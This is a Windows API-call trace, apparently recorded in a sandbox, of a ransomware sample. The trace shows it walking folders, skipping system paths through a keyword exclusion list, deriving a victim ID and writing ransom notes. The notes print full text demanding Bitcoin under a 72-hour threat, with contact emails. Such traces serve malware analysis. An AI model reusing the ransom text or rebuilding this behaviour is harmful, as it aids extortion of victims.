	[0167.106] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.107] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.107] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.107] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0167.107] CloseHandle (hObject=0x388) returned 1
	[0167.108] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7d2149fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.108] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*") returned 50
	[0167.108] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.108] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*") returned 0x32
	[0167.109] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.109] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="windows") returned 0x0
	[0167.109] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.110] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="boot") returned 0x0
	[0167.110] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.111] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="system volume information") returned 0x0
	[0167.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.111] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.111] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="temp") returned 0x0
	[0167.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.112] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="program files") returned 0x0
	[0167.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.112] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.112] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="appdata") returned 0x0
	[0167.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.112] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="application data") returned 0x0
	[0167.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.113] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="winnt") returned 0x0
	[0167.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.113] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="tmp") returned 0x0
	[0167.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.113] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="cache") returned 0x0
	[0167.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.113] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="webcache") returned 0x0
	[0167.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="inetcache") returned 0x0
	[0167.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="nvidia") returned 0x0
	[0167.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="packages") returned 0x0
	[0167.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="cookies") returned 0x0
	[0167.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="programdata") returned 0x0
	[0167.115] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.116] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7d2149fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.116] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 1
	[0167.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2149fe, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d2149fe, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d2149fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d1eec7c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d1eec7c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d2149fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d1eec7c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d1eec7c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d2149fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0167.116] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.117] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.117] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 0
	[0167.117] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0167.117] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0167.118] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DataMart", cAlternateFileName="")) returned 1
	[0167.118] lstrcmpW (lpString1="DataMart", lpString2="..") returned 1
	[0167.118] lstrcmpW (lpString1="DataMart", lpString2=".") returned 1
	[0167.118] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0167.118] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0167.118] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="DataMart" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart") returned="C:\\Users\\All Users\\Microsoft\\DataMart"
	[0167.118] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart") returned="C:\\Users\\All Users\\Microsoft\\DataMart"
	[0167.119] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\"
	[0167.119] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\"
	[0167.119] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*"
	[0167.119] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*" (normalized: "c:\\users\\all users\\microsoft\\datamart\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0167.215] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*") returned 41
	[0167.215] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.216] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\datamart\\*.*") returned 0x29
	[0167.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="windows") returned 0x0
	[0167.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="boot") returned 0x0
	[0167.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="system volume information") returned 0x0
	[0167.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="temp") returned 0x0
	[0167.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="program files") returned 0x0
	[0167.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="appdata") returned 0x0
	[0167.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="application data") returned 0x0
	[0167.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.220] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="winnt") returned 0x0
	[0167.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.220] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="tmp") returned 0x0
	[0167.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.220] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="cache") returned 0x0
	[0167.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.221] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.221] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="webcache") returned 0x0
	[0167.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.221] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="inetcache") returned 0x0
	[0167.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.221] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="nvidia") returned 0x0
	[0167.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.222] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="packages") returned 0x0
	[0167.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.222] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="cookies") returned 0x0
	[0167.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.222] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\*.*", lpSrch="programdata") returned 0x0
	[0167.222] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.223] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PaidWiFi", cAlternateFileName="")) returned 1
	[0167.223] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PaidWiFi", cAlternateFileName="")) returned 0
	[0167.223] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0167.223] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0167.223] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DataMart" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart") returned="C:\\Users\\All Users\\Microsoft\\DataMart"
	[0167.223] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DataMart\\*.*"
	[0167.223] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.224] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.224] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0167.224] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\datamart\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.225] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.225] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.227] CloseHandle (hObject=0x384) returned 1
	[0167.228] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.228] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.229] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0167.230] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.230] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\datamart\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.230] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.230] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.230] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0167.231] CloseHandle (hObject=0x384) returned 1
	[0167.231] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.231] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.232] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.232] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0167.232] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DataMart\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.232] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.232] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0167.234] CloseHandle (hObject=0x384) returned 1
	[0167.235] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.236] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.236] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0167.238] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
